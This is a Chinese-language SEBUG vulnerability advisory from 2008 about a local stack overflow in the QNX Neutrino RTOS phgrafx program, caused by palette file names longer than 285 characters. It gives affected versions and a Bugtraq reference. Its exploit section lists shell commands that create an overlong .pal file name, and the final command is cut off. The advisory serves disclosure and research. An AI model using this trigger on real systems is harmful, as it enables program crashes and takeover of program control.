QNX Neutrino RTOS phgrafx本地栈溢出漏洞
发布时间(Published):2008-07-01
SBEUGID:SEBUG-20080713524
影响版本(Vulnerable):
QNX Neutrino RTOS 6.3.2
QNX Neutrino RTOS 6.3.0
漏洞描述(Discription):
BUGTRAQ ID: 30024

QNX Neutrino RTOS是嵌入系统中所使用的实时操作系统。

QNX RTOS的/usr/photon/bin/phgrafx文件没有正确地处理PHOTON_PATH/palette/*.pal文件,如果用户在palette目录中创建了文件名大于285字符的.pal扩展名的话,就会触发栈溢出,允许攻击者完全控制程序流。
<* 参考(References)
Filipe Balestra (filipe@balestra.com.br
http://marc.info/?l=bugtraq&m=121492463823645&w=2
*>
SEBUG安全建议(solution):

QNX
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.qnx.com/

测试方法(Exploit):
[www.sebug.net]
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
# PHOTON_PATH=/tmp

# cd /tmp

# mkdir palette

# cd palette

# touch `perl -e 'print "A" x 290 . ".pal"'`

# /usr/
// Sebug.net [ 2008-07-03 ]

Home | Submit Info | Lib | Help | Forum | Partners
Copyright © 2006-2008 SEBUG Security Database. All rights Reserved
鄂ICP备05024839号